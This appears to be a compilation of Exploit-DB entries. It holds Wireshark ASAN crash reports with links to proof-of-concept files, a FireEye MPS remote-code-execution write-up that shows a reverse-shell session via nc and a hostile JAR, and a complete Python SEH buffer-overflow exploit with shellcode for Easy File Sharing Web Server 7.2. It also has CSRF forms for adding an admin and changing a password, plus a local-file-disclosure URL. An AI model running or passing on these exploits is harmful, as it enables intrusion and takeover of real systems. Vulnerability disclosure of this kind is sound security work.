#5 0x37930d4 in dissect_rsvp wireshark/epan/dissectors/packet-rsvp.c:7553:5
#6 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#7 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#8 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#9 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#10 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#11 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#12 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#13 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#14 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#15 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#16 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#17 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#18 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#19 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#20 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#21 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#22 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#23 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#24 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#25 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#26 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#27 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#28 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#29 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#30 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#31 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#32 0x53c91b in process_packet wireshark/tshark.c:3728:5
#33 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#34 0x52c1df in main wireshark/tshark.c:2197:13
0x61b00001e3b2 is located 50 bytes inside of 1500-byte region [0x61b00001e380,0x61b00001e95c)
freed by thread T0 here:
#0 0x4d7380 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
#1 0x7f77e4aff6ae in g_realloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e6ae)
#2 0x9d71b7 in wtap_read_packet_bytes wireshark/wiretap/wtap.c:1419:2
#3 0x89ee21 in libpcap_read_packet wireshark/wiretap/libpcap.c:722:7
#4 0x8991f4 in libpcap_read wireshark/wiretap/libpcap.c:619:9
#5 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#6 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#7 0x52c1df in main wireshark/tshark.c:2197:13
previously allocated by thread T0 here:
#0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7f77e4aff610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x83fff6 in wtap_open_offline wireshark/wiretap/file_access.c:1105:2
#3 0x53214d in cf_open wireshark/tshark.c:4195:9
#4 0x52bc7e in main wireshark/tshark.c:2188:9
SUMMARY: AddressSanitizer: heap-use-after-free llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:416 in memcmp
Shadow bytes around the buggy address:
0x0c367fffbc20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbc30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbc40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbc50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbc60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c367fffbc70: fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd
0x0c367fffbc80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c367fffbc90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c367fffbca0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c367fffbcb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c367fffbcc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5117==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11793. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39002.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=644
The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==4567==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc1c406210 at pc 0x0000004c1386 bp 0x7ffc1c406010 sp 0x7ffc1c4057c0
WRITE of size 32 at 0x7ffc1c406210 thread T0
#0 0x4c1385 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0xc27f15 in tvb_memcpy wireshark/epan/tvbuff.c:783:10
#2 0x233feeb in dissect_diameter_base_framed_ipv6_prefix wireshark/epan/dissectors/packet-diameter.c:526:3
#3 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#4 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#5 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#6 0x234b527 in call_avp_subdissector wireshark/epan/dissectors/packet-diameter.c:612:4
#7 0x234a804 in dissect_diameter_avp wireshark/epan/dissectors/packet-diameter.c:805:2
#8 0x23514b5 in dissect_diameter_common wireshark/epan/dissectors/packet-diameter.c:1405:13
#9 0x233f82f in dissect_diameter wireshark/epan/dissectors/packet-diameter.c:1495:9
#10 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#11 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#12 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#13 0x39012a2 in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2517:9
#14 0x38f7d37 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3443:16
#15 0x38f0ac8 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c:4360:14
#16 0x38ed8e6 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4515:9
#17 0x38eb79f in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4678:3
#18 0x38e95d5 in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4732:3
#19 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#20 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#21 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#22 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#23 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#24 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#25 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#26 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#27 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#28 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#29 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#30 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#31 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#32 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#33 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#34 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#35 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#36 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#37 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#38 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#39 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#40 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#41 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#42 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#43 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#44 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#45 0x53c91b in process_packet wireshark/tshark.c:3728:5
#46 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#47 0x52c1df in main wireshark/tshark.c:2197:13
Address 0x7ffc1c406210 is located in stack of thread T0 at offset 48 in frame
#0 0x233fb4f in dissect_diameter_base_framed_ipv6_prefix wireshark/epan/dissectors/packet-diameter.c:504
This frame has 2 object(s):
[32, 48) 'value'
[64, 80) 'addr' <== Memory access at offset 48 partially underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x100003878bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100003878c00: 00 00 00 00 f1 f1 f1 f1 04 f2 04 f3 00 00 00 00
0x100003878c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100003878c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100003878c30: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
=>0x100003878c40: 00 00[f2]f2 00 00 f3 f3 00 00 00 00 00 00 00 00
0x100003878c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100003878c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100003878c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100003878c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100003878c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==4567==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11792. Attached is a file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39003.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=643
The following crash due to a stack-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==3901==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffeadbc852d at pc 0x0000009cea23 bp 0x7ffeadbbf650 sp 0x7ffeadbbf648
READ of size 1 at 0x7ffeadbc852d thread T0
#0 0x9cea22 in find_signature wireshark/wiretap/vwr.c:2214:17
#1 0x9c5066 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1435:15
#2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20
#3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10
#4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#6 0x52c1df in main wireshark/tshark.c:2197:13
Address 0x7ffeadbc852d is located in stack of thread T0 at offset 32813 in frame
#0 0x9bbbcf in vwr_process_rec_data wireshark/wiretap/vwr.c:2320
This frame has 1 object(s):
[32, 32800) 'rec' <== Memory access at offset 32813 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/wiretap/vwr.c:2214:17 in find_signature
Shadow bytes around the buggy address:
0x100055b71050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b71060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b71070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b71080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b71090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x100055b710a0: 00 00 00 00 f3[f3]f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
0x100055b710b0: f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
0x100055b710c0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b710d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b710e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b710f0: f1 f1 f1 f1 04 f2 04 f3 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==3901==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11791. Attached are two files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39004.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=642
The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
Attached are three files which trigger the crash.
--- cut ---
==2992==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe9b2a2fc0 at pc 0x0000004c1386 bp 0x7ffe9b2a0f70 sp 0x7ffe9b2a0720
WRITE of size 43264 at 0x7ffe9b2a2fc0 thread T0
#0 0x4c1385 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0x4189c2b in AirPDcapPacketProcess wireshark/epan/crypt/airpdcap.c:713:9
#2 0x29525e9 in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:17767:9
#3 0x2924581 in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18375:10
#4 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#5 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#6 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#7 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#8 0x28d825c in dissect_wlan_radio wireshark/epan/dissectors/packet-ieee80211-radio.c:976:10
#9 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#10 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#11 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#12 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#13 0x28e5df4 in dissect_radiotap wireshark/epan/dissectors/packet-ieee80211-radiotap.c:1796:2
#14 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#15 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#16 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#17 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#18 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#19 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#20 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#21 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#22 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#23 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#24 0x53c91b in process_packet wireshark/tshark.c:3728:5
#25 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#26 0x52c1df in main wireshark/tshark.c:2197:13
Address 0x7ffe9b2a2fc0 is located in stack of thread T0 at offset 8256 in frame
#0 0x418907f in AirPDcapPacketProcess wireshark/epan/crypt/airpdcap.c:630
This frame has 5 object(s):
[32, 44) 'id'
[64, 8256) 'tmp_data'
[8512, 8516) 'tmp_len' <== Memory access at offset 8256 partially underflows this variable
[8528, 8544) 'id.coerce' <== Memory access at offset 8256 partially underflows this variable
[8560, 8576) 'id.coerce83' <== Memory access at offset 8256 partially underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x10005364c5a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10005364c5b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10005364c5c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10005364c5d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10005364c5e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10005364c5f0: 00 00 00 00 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2
0x10005364c600: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
0x10005364c610: f2 f2 f2 f2 f2 f2 f2 f2 04 f2 00 00 f2 f2 00 00
0x10005364c620: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x10005364c630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10005364c640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==2992==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11790. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39005.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=641
The following crash due to a stack-based out-of-bounds memory read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==2067==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe26462c20 at pc 0x0000009cf704 bp 0x7ffe26462b70 sp 0x7ffe26462b68
READ of size 4 at 0x7ffe26462c20 thread T0
#0 0x9cf703 in getRate wireshark/wiretap/vwr.c:2276:20
#1 0x9c74f7 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1533:25
#2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20
#3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10
#4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#6 0x52c1df in main wireshark/tshark.c:2197:13
Address 0x7ffe26462c20 is located in stack of thread T0 at offset 160 in frame
#0 0x9cf32f in getRate wireshark/wiretap/vwr.c:2261
This frame has 6 object(s):
[32, 80) 'canonical_rate_legacy'
[112, 144) 'canonical_ndbps_20_ht'
[176, 208) 'canonical_ndbps_40_ht' <== Memory access at offset 160 underflows this variable
[240, 276) 'canonical_ndbps_20_vht'
[320, 360) 'canonical_ndbps_40_vht'
[400, 440) 'canonical_ndbps_80_vht'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/wiretap/vwr.c:2276:20 in getRate
Shadow bytes around the buggy address:
0x100044c84530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c84540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c84550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c84560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c84570: f1 f1 f1 f1 00 00 00 00 00 00 f2 f2 f2 f2 00 00
=>0x100044c84580: 00 00 f2 f2[f2]f2 00 00 00 00 f2 f2 f2 f2 00 00
0x100044c84590: 00 00 04 f2 f2 f2 f2 f2 00 00 00 00 00 f2 f2 f2
0x100044c845a0: f2 f2 00 00 00 00 00 f3 f3 f3 f3 f3 00 00 00 00
0x100044c845b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c845c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c845d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==2067==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11789. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39006.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=666
The FireEye MPS (Malware Protection System) is vulnerable to a remote code execution vulnerability, simply from monitoring hostile traffic. FireEye is designed to operate as a passive network tap, so that it can see all the files and emails that enter a monitored network.
This vulnerability allows an attacker to compromise the FireEye device, get a root shell and start monitoring all traffic on the victim network (emails, attachments, downloads, web browsing, etc). This is about the worst possible vulnerability that you can imagine for a FireEye user, it literally does not get worse than this.
This bug is in one of the analysis tools used by the MIP (Malware Input Processor), which has various tools for analysis of different file types. One of these tools is a script that attempts to decompile Java Archives, then runs some simple regexes over the decompiled code:
$ grep subprocess.Popen /opt/fireeye/scripts/mip/content/jar.py
sp = subprocess.Popen(yara_cmd,stdout=outfile)
sp = subprocess.Popen(cmd_list,stdout=outfile,stderr=errfile)
sp = subprocess.Popen(jarsigner_cmd,stdout=outfile,stderr=errfile)
The decompiler used is actually a modified version of JODE, an ancient opensource decompiler written in Java:
http://jode.sourceforge.net/
Examining the source code for JODE, it supports a "String Deobfuscation" feature that relies on reflection, this is visible here:
http://sourceforge.net/p/jode/code/HEAD/tree/trunk/jode/src/net/sf/jode/expr/InvokeOperator.java
public Object invokeMethod(Reference ref, boolean isVirtual,
Object cls, Object[] params)
throws InterpreterException, InvocationTargetException {
if (cls == null && ref.getClazz().equals(classSig)) {
BasicBlocks bb = classInfo
.findMethod(ref.getName(), ref.getType())
.getBasicBlocks();
if (bb != null)
return interpreter.interpretMethod(bb, null, params);
throw new InterpreterException
("Can't interpret static native method: "+ref);
} else
return super.invokeMethod(ref, isVirtual, cls, params);
}
}
By carefully crafting a class file that passes JODE's test for obfuscation, we were able to invoke arbitrary methods using reflection. We did this using the jasmin compiler:
# create the hostile JAR
$ jasmin ReverseShell.j
$ jar cvf fireeye.jar ReverseShell.class
added manifest
adding: ReverseShell.class(in = 489) (out= 311)(deflated 36%)
# Now start a reverse shell listening
$ nc -lp 9090 &
[1] 11115
# download a file over the monitored network
$ curl http://192.168.1.1/appliance-test/fireeye.jar &> /dev/null
# wait for the connect back shell attempt
$ wait
uid=821(mip) gid=3111(mip)
groups=3111(mip),602(antivirus),2000(analysis),3001(stats),3134(mip_child),3200(dipcshm),3203(reports),3204(contents),3210(mip_client)
[1]+ Done nc -lp 9090
# Code execution!
(Getting root from gid=mip_child is trivial, this is a second bug that will be filed.)
The Jasmin file we used is attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39007.zip
# Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP request SEH Buffer Overflow
# Date: 12/2/2015
# Exploit Author: ArminCyber
# Contact: Armin.Exploit@gmail.com
# Version: 7.2
# Tested on: XP SP3 EN
# category: Remote Exploit
# Usage: ./exploit.py ip port
import socket
import sys
host = str(sys.argv[1])
port = int(sys.argv[2])
a = socket.socket()
print "Connecting to: " + host + ":" + str(port)
a.connect((host,port))
entire=4500
# Junk
buff = "A"*4061
# Next SEH
buff+= "\xeb\x0A\x90\x90"
# pop pop ret
buff+= "\x98\x97\x01\x10"
buff+= "\x90"*19
# calc.exe
# Bad Characters: \x20 \x2f \x5c
shellcode = (
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
"\x1c\x39\xbd"
)
buff+= shellcode
buff+= "\x90"*7
buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20)
# GET
a.send("GET " + buff + " HTTP/1.0\r\n\r\n")
a.close()
print "Done..."
source: https://www.securityfocus.com/bid/64740/info
EZGenerator is prone to a local file-disclosure vulnerability and a cross-site request-forgery vulnerability.
An attacker may leverage these issues to perform unauthorized actions in the context of a logged-in user, or obtain sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
Local File Disclosure:
=====================
www.example.com/utils.php?action=download&filename=file.php%00
CSRF [Add Admin]:
================
<form method=.POST. name=.form0. action=.
http://www.example.com/centraladmin.php?process=processuser.>
<input type=.hidden. name=.flag. value=.add./>
<input type=.hidden. name=.old_username. value=."/>
<input type=.hidden. name=.username. value=.admin./>
<input type=.hidden. name=.name. value=.mm./>
<input type=.hidden. name=.sirname. value=.hh./>
<input type=.hidden. name=.email. value=.email@live.com./>
<input type=.hidden. name=.password. value=.12121212./>
<input type=.hidden. name=.repeatedpassword. value=.12121212./>
<input type=.hidden. name=.select_all. value=.yes./>
<input type=.hidden. name=.access_to_page47. value=.2./>
<input type=.hidden. name=.save. value=.Save./>
</form>
</body>
</html>
source: https://www.securityfocus.com/bid/64735/info
Built2Go PHP Shopping is prone to a cross-site request-forgery vulnerability.
Exploiting the issue will allow a remote attacker to use a victim's currently active session to change the victim's password. Successful exploits will compromise affected computers.
<form method=â?POSTâ? name=â?form0? action=â? http://www.example.com/adminpanel/edit_admin.phpâ?>
<input type=â?hiddenâ? name=â?useridâ? value=â?ADMINâ?/>
<input type=â?hiddenâ? name=â?passâ? value=â?12121212?/>
<input type=â?hiddenâ? name=â?retypepassâ? value=â?12121212?/>
<input type=â?hiddenâ? name=â?addnewâ? value=â?1?/>
<input type=â?hiddenâ? name=â?actionâ? value=â?saveâ?/>
<input type=â?hiddenâ? name=â?newâ? value=â?Submitâ?/>
</form>